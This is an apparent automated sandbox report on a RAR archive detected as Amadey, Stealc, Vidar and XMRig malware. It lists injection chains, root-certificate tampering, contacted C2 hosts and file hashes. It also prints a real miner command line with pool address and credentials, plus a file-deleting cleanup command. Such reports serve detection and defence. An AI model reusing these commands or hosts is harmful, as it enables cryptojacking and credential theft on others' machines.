Malware Analysis Report

2024-09-11 16:05

Sample ID 240614-q3gg3axakn
Target files.rar
SHA256 c1ab245055a7fba415a767d00d2716deeb6b45027de02da058c08d40971c7aa0
Tags
amadey stealc vidar xmrig ffb1b9 discovery execution miner spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c1ab245055a7fba415a767d00d2716deeb6b45027de02da058c08d40971c7aa0

Threat Level: Known bad

The file files.rar was found to be: Known bad.

Malicious Activity Summary

amadey stealc vidar xmrig ffb1b9 discovery execution miner spyware stealer trojan upx

Stealc

Vidar

xmrig

Detect Vidar Stealer

Amadey

XMRig Miner payload

Downloads MZ/PE file

Blocklisted process makes network request

Reads user/profile data of local email clients

Checks computer location settings

Executes dropped EXE

Reads data files stored by FTP clients

Loads dropped DLL

Reads user/profile data of web browsers

UPX packed file

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Command and Scripting Interpreter: PowerShell

Modifies system certificate store

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Suspicious behavior: MapViewOfSection

Delays execution with timeout.exe

Suspicious use of SetWindowsHookEx

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
Persistence
TA0003
Privilege Escalation
TA0004
Defense Evasion
TA0005
Subvert Trust Controls
T1553
Install Root Certificate
T1553.004
Modify Registry
T1112
Credential Access
TA0006
Unsecured Credentials
T1552
Credentials In Files
T1552.001
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Data from Local System
T1005
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-14 13:47

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 13:46

Reported

2024-06-14 13:51

Platform

win10v2004-20240611-en

Max time kernel

226s

Max time network

227s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\files.rar

Signatures

Amadey

trojan amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Vidar

stealer vidar

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\coml.au3 N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\files\Setup.exe N/A
N/A N/A C:\ProgramData\GHIJJEGDBF.exe N/A
N/A N/A C:\ProgramData\AECAECFCAA.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\files\Setup.exe N/A
N/A N/A C:\Users\Admin\Desktop\files\Setup.exe N/A
N/A N/A C:\Users\Admin\Desktop\files\Setup.exe N/A
N/A N/A C:\Users\Admin\Desktop\files\Setup.exe N/A
N/A N/A C:\Users\Admin\Desktop\files\Setup.exe N/A
N/A N/A C:\Users\Admin\Desktop\files\Setup.exe N/A
N/A N/A C:\Users\Admin\Desktop\files\Setup.exe N/A
N/A N/A C:\Users\Admin\Desktop\files\Setup.exe N/A
N/A N/A C:\Users\Admin\Desktop\files\Setup.exe N/A
N/A N/A C:\Users\Admin\Desktop\files\Setup.exe N/A
N/A N/A C:\Users\Admin\Desktop\files\Setup.exe N/A
N/A N/A C:\Users\Admin\Desktop\files\Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\coml.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\coml.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\coml.au3 N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4368 set thread context of 4136 N/A C:\Users\Admin\Desktop\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2544 set thread context of 3876 N/A C:\ProgramData\GHIJJEGDBF.exe C:\Windows\SysWOW64\ftp.exe
PID 3160 set thread context of 2904 N/A C:\ProgramData\AECAECFCAA.exe C:\Windows\SysWOW64\ftp.exe
PID 2904 set thread context of 1212 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 1212 set thread context of 4996 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\TWI Cloud Host.job C:\Windows\SysWOW64\ftp.exe N/A
File created C:\Windows\Tasks\Watcher Com SH.job C:\Windows\SysWOW64\ftp.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\coml.au3 N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Program Files\7-Zip\7zFM.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\coml.au3 N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\coml.au3 N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\files\Setup.exe N/A
N/A N/A C:\Users\Admin\Desktop\files\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\coml.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\coml.au3 N/A
N/A N/A C:\ProgramData\GHIJJEGDBF.exe N/A
N/A N/A C:\ProgramData\AECAECFCAA.exe N/A
N/A N/A C:\ProgramData\GHIJJEGDBF.exe N/A
N/A N/A C:\ProgramData\AECAECFCAA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\coml.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\coml.au3 N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\files\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\ProgramData\GHIJJEGDBF.exe N/A
N/A N/A C:\ProgramData\AECAECFCAA.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4368 wrote to memory of 4136 N/A C:\Users\Admin\Desktop\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 4368 wrote to memory of 4136 N/A C:\Users\Admin\Desktop\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 4368 wrote to memory of 4136 N/A C:\Users\Admin\Desktop\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 4368 wrote to memory of 4136 N/A C:\Users\Admin\Desktop\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 4136 wrote to memory of 3820 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\coml.au3
PID 4136 wrote to memory of 3820 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\coml.au3
PID 4136 wrote to memory of 3820 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\coml.au3
PID 4136 wrote to memory of 3820 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\coml.au3
PID 4136 wrote to memory of 3820 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\coml.au3
PID 3820 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\coml.au3 C:\ProgramData\GHIJJEGDBF.exe
PID 3820 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\coml.au3 C:\ProgramData\GHIJJEGDBF.exe
PID 3820 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\coml.au3 C:\ProgramData\GHIJJEGDBF.exe
PID 3820 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\coml.au3 C:\ProgramData\AECAECFCAA.exe
PID 3820 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\coml.au3 C:\ProgramData\AECAECFCAA.exe
PID 3820 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\coml.au3 C:\ProgramData\AECAECFCAA.exe
PID 2544 wrote to memory of 3876 N/A C:\ProgramData\GHIJJEGDBF.exe C:\Windows\SysWOW64\ftp.exe
PID 2544 wrote to memory of 3876 N/A C:\ProgramData\GHIJJEGDBF.exe C:\Windows\SysWOW64\ftp.exe
PID 2544 wrote to memory of 3876 N/A C:\ProgramData\GHIJJEGDBF.exe C:\Windows\SysWOW64\ftp.exe
PID 3160 wrote to memory of 2904 N/A C:\ProgramData\AECAECFCAA.exe C:\Windows\SysWOW64\ftp.exe
PID 3160 wrote to memory of 2904 N/A C:\ProgramData\AECAECFCAA.exe C:\Windows\SysWOW64\ftp.exe
PID 3160 wrote to memory of 2904 N/A C:\ProgramData\AECAECFCAA.exe C:\Windows\SysWOW64\ftp.exe
PID 2544 wrote to memory of 3876 N/A C:\ProgramData\GHIJJEGDBF.exe C:\Windows\SysWOW64\ftp.exe
PID 3160 wrote to memory of 2904 N/A C:\ProgramData\AECAECFCAA.exe C:\Windows\SysWOW64\ftp.exe
PID 3820 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\coml.au3 C:\Windows\SysWOW64\cmd.exe
PID 3820 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\coml.au3 C:\Windows\SysWOW64\cmd.exe
PID 3820 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\coml.au3 C:\Windows\SysWOW64\cmd.exe
PID 4308 wrote to memory of 4104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4308 wrote to memory of 4104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4308 wrote to memory of 4104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2904 wrote to memory of 1212 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 2904 wrote to memory of 1212 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 3876 wrote to memory of 3540 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 3876 wrote to memory of 3540 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 3876 wrote to memory of 3540 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 2904 wrote to memory of 1212 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 2904 wrote to memory of 1212 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 3876 wrote to memory of 3540 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 1212 wrote to memory of 4996 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 1212 wrote to memory of 4996 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 1212 wrote to memory of 4996 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 1212 wrote to memory of 4996 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 1212 wrote to memory of 4996 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 1212 wrote to memory of 4996 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 1212 wrote to memory of 4996 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 3540 wrote to memory of 4668 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 4668 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3540 wrote to memory of 4668 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\files.rar

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\files.rar"

C:\Users\Admin\Desktop\files\Setup.exe

"C:\Users\Admin\Desktop\files\Setup.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\SysWOW64\netsh.exe

C:\Users\Admin\AppData\Local\Temp\coml.au3

C:\Users\Admin\AppData\Local\Temp\coml.au3

C:\ProgramData\GHIJJEGDBF.exe

"C:\ProgramData\GHIJJEGDBF.exe"

C:\ProgramData\AECAECFCAA.exe

"C:\ProgramData\AECAECFCAA.exe"

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BAEBGCFIEHCF" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1000003041\run.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 131.253.33.237:443 g.bing.com tcp
US 8.8.8.8:53 237.33.253.131.in-addr.arpa udp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
NL 23.62.61.75:443 www.bing.com tcp
US 8.8.8.8:53 75.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 feeldog.xyz udp
US 104.21.13.222:443 feeldog.xyz tcp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 222.13.21.104.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
DE 195.201.251.58:9000 195.201.251.58 tcp
DE 195.201.251.58:9000 195.201.251.58 tcp
DE 195.201.251.58:9000 195.201.251.58 tcp
DE 195.201.251.58:9000 195.201.251.58 tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 58.251.201.195.in-addr.arpa udp
DE 195.201.251.58:9000 195.201.251.58 tcp
DE 195.201.251.58:9000 195.201.251.58 tcp
DE 195.201.251.58:9000 195.201.251.58 tcp
DE 195.201.251.58:9000 195.201.251.58 tcp
DE 195.201.251.58:9000 195.201.251.58 tcp
DE 195.201.251.58:9000 195.201.251.58 tcp
DE 195.201.251.58:9000 195.201.251.58 tcp
DE 195.201.251.58:9000 195.201.251.58 tcp
US 8.8.8.8:53 businessdownloads.ltd udp
US 104.21.16.123:443 businessdownloads.ltd tcp
US 8.8.8.8:53 123.16.21.104.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
DE 195.201.251.58:9000 195.201.251.58 tcp
US 8.8.8.8:53 i.imgur.com udp
US 199.232.192.193:443 i.imgur.com tcp
US 8.8.8.8:53 193.192.232.199.in-addr.arpa udp
DE 195.201.251.58:9000 195.201.251.58 tcp
DE 195.201.251.58:9000 195.201.251.58 tcp
DE 195.201.251.58:9000 195.201.251.58 tcp
DE 195.201.251.58:9000 195.201.251.58 tcp
DE 195.201.251.58:9000 195.201.251.58 tcp
DE 195.201.251.58:9000 195.201.251.58 tcp
US 8.8.8.8:53 5.173.189.20.in-addr.arpa udp
FI 135.181.22.88:80 135.181.22.88 tcp
US 8.8.8.8:53 88.22.181.135.in-addr.arpa udp
FI 65.109.127.181:3333 tcp
FI 65.109.127.181:3333 tcp
US 8.8.8.8:53 proresupdate.com udp
US 45.152.112.146:80 proresupdate.com tcp
US 8.8.8.8:53 contur2fa.recipeupdates.rest udp
US 172.67.197.250:443 contur2fa.recipeupdates.rest tcp
US 8.8.8.8:53 146.112.152.45.in-addr.arpa udp
US 8.8.8.8:53 250.197.67.172.in-addr.arpa udp
US 172.67.197.250:443 contur2fa.recipeupdates.rest tcp
FI 65.109.127.181:3333 tcp
FI 65.109.127.181:3333 tcp
FI 65.109.127.181:3333 tcp
N/A 224.0.0.251:5353 udp
FI 65.109.127.181:3333 tcp
FI 65.109.127.181:3333 tcp

Files

C:\Users\Admin\Desktop\files\Setup.exe

MD5 c637e5ecf625b72f4bef9d28cd81d612
SHA1 a2c1329d290e508ee9fd0eb81e7f25d57e450f8c
SHA256 111c56593668be63e1e0c79a2d33d9e2d49cdf0c5100663c72045bc6b76e9fe6
SHA512 727d78bab4fab3674eec92ca5f07df6a0095ab3b973dd227c599c70e8493592bb53bb9208cc6270713283ef0065acfad3203ddcf4dcb6d43f8727f09ceaaf2e4

C:\Users\Admin\Desktop\files\msvcp140.dll

MD5 1ba6d1cf0508775096f9e121a24e5863
SHA1 df552810d779476610da3c8b956cc921ed6c91ae
SHA256 74892d9b4028c05debaf0b9b5d9dc6d22f7956fa7d7eee00c681318c26792823
SHA512 9887d9f5838aa1555ea87968e014edfe2f7747f138f1b551d1f609bc1d5d8214a5fdab0d76fcac98864c1da5eb81405ca373b2a30cb12203c011d89ea6d069af

C:\Users\Admin\Desktop\files\vcruntime140.dll

MD5 49c96cecda5c6c660a107d378fdfc3d4
SHA1 00149b7a66723e3f0310f139489fe172f818ca8e
SHA256 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512 e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

C:\Users\Admin\Desktop\files\vcruntime140_1.dll

MD5 cf0a1c4776ffe23ada5e570fc36e39fe
SHA1 2050fadecc11550ad9bde0b542bcf87e19d37f1a
SHA256 6fd366a691ed68430bcd0a3de3d8d19a0cb2102952bfc140bbef4354ed082c47
SHA512 d95cd98d22ca048d0fc5bca551c9db13d6fa705f6af120bbbb621cf2b30284bfdc7320d0a819bb26dab1e0a46253cc311a370bed4ef72ecb60c69791ed720168

C:\Users\Admin\Desktop\files\flutter_windows.dll

MD5 b240e55a02ba690ae0c07b97eb7a78ed
SHA1 829ac8c313f253eeeec33d8bd9f4fe8b1c8e2cc8
SHA256 02e83afa12741cc245c2d3e8754beded58efc3c5173987910d84541f098d6ae9
SHA512 76fcb731389ce5a0d41b20395c72baca5aa128b591e2b56a8f311cd65983623342f129a824acddd98c74d54bf45ba9b360ea5c37b23c8204c1febef9d79dba3b

C:\Users\Admin\Desktop\files\covalency.dwg

MD5 5592c01b512749d9dce7c6d5861ee385
SHA1 ad19e91e76aadda703ae31e7bcc7602c5f67fc00
SHA256 77c5dfbc5c124b1e8acb65db529b5c2ef672aa5eb39d8d1ee89325db16efa6d7
SHA512 6811ca9ffe9fdbd7bf8ed56ab95f39b2d125054578105c1561b9c428960f771d31cc49367e43a86648f04e6b4bd3cd3ffbd2b403c89a8da5574265cd48c6b855

